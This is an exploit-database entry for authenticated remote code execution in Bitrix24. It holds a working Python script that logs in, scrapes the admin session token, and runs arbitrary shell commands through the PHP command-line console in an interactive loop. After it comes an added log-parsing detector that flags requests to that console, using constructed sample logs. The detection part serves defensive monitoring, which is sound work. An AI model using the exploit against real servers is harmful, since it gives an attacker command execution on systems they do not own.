Bitrix24 Remote Code Execution

2022.05.11
Credit: heinjame
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated)
# Date: 4/22/2022
# Exploit Author: picaro_o
# Vendor Homepage: https://www.bitrix24.com/apps/desktop.php
# Tested on: Linux os
#!/usr/bin/env python
# Created by heinjame
import argparse
import re
import sys

import requests
from bs4 import BeautifulSoup

user_agent = {'User-agent': 'HeinJame'}

parser = argparse.ArgumentParser()
parser.add_argument("host", help="Bitrix URL")
parser.add_argument("uname", help="Bitrix Username")
parser.add_argument("pass", help="Bitrix Password")
pargs = parser.parse_args()

# Take the values from argparse rather than raw sys.argv; a trailing slash on
# the host is stripped so every path below can start with "/".
url = pargs.host.rstrip("/")
username = pargs.uname
password = getattr(pargs, "pass")   # "pass" is a Python keyword, so no attribute syntax

s = requests.Session()


def login():
    # Standard Bitrix login form post; the session cookie is kept in `s`.
    postdata = {'AUTH_FORM': 'Y', 'TYPE': 'AUTH', 'backurl': '%2Fstream%2F',
                'USER_LOGIN': username, 'USER_PASSWORD': password}
    r = s.post(url + "/stream/?login=yes", headers=user_agent, data=postdata)
    # print(r.text)


def getsessionid():
    # The admin PHP command line page embeds the CSRF token as 'bitrix_sessid': '...'
    # (the original request omitted the ".php" suffix used by cmdline() below).
    sessionid = s.get(url + "/bitrix/admin/php_command_line.php?lang=en", headers=user_agent)
    session = re.search(r"'bitrix_sessid':.*", sessionid.text)
    if session is None:
        sys.exit("bitrix_sessid not found: login failed or user is not an administrator")
    extract = session.group(0).split(":")
    realdata = extract[1].strip(" ")
    realdata = realdata.replace("'", "")
    realdata = realdata.replace(",", "")
    return realdata


def cmdline(cmd, sessionid):
    # Submit the command to the PHP console; the output comes back inside a <p> tag.
    cmdline = {'query': "system('" + cmd + "');", 'result_as_text': 'n', 'ajax': 'y'}
    usercmd = s.post(url + "/bitrix/admin/php_command_line.php?lang=en&sessid=" + sessionid,
                     headers=user_agent, data=cmdline)
    soup = BeautifulSoup(usercmd.content, 'html.parser')
    p = soup.find('p')
    out = p.getText() if p is not None else usercmd.text
    print(out.rstrip())


login()
sessionid = getsessionid()
inputcmd = input(">>")
while inputcmd != "exit":
    cmdline(inputcmd, sessionid)
    inputcmd = input(">>")
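The script above leaves a recognisable trace in the web server log: a GET of /bitrix/admin/php_command_line.php followed by POSTs to the same path carrying a sessid parameter. The following detection example is added here and is not part of the exploit listing; it parses combined-format access log lines (the sample lines are constructed, not taken from any real server) and flags use of the admin PHP console, rating a POST with sessid higher than a plain view of the page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" log format (not from the page).
# Line 3 mirrors the exploit's POST to the PHP console with a sessid parameter.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Apr/2022:10:01:02 +0000] "POST /stream/?login=yes HTTP/1.1" 302 0 "-" "HeinJame"
10.0.0.5 - - [22/Apr/2022:10:01:03 +0000] "GET /bitrix/admin/php_command_line.php?lang=en HTTP/1.1" 200 5120 "-" "HeinJame"
10.0.0.5 - - [22/Apr/2022:10:01:05 +0000] "POST /bitrix/admin/php_command_line.php?lang=en&sessid=abc123 HTTP/1.1" 200 312 "-" "HeinJame"
10.0.0.7 - - [22/Apr/2022:10:02:00 +0000] "GET /bitrix/admin/index.php?lang=en HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Path of the Bitrix admin PHP console used by the exploit above.
PHP_CONSOLE = "/bitrix/admin/php_command_line.php"


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = COMBINED_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def classify(rec):
    """Return a finding for requests to the PHP console, else None."""
    if rec is None or rec["path"] != PHP_CONSOLE:
        return None
    # A POST carrying sessid is the console actually executing submitted PHP;
    # a GET is only the console page being opened, which is still worth recording.
    executed = rec["method"] == "POST" and "sessid" in rec["query"]
    return {
        "ip": rec["ip"],
        "ts": rec["ts"],
        "method": rec["method"],
        "status": rec["status"],
        "ua": rec["ua"],
        "severity": "high" if executed else "medium",
    }


def scan(log_text):
    """Run every line through the parser and classifier; return the list of findings."""
    findings = []
    for line in log_text.splitlines():
        finding = classify(parse_line(line))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ts']} {f['ip']} {f['method']} "
              f"status={f['status']} ua={f['ua']!r}")
```

Any hit on this path outside a known administrative change window deserves a look, since the console exists only for administrators and legitimate use is rare; the same check can be pointed at a real access log by replacing SAMPLE_LOG with the file contents.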


Copyright 2024, cxsecurity.com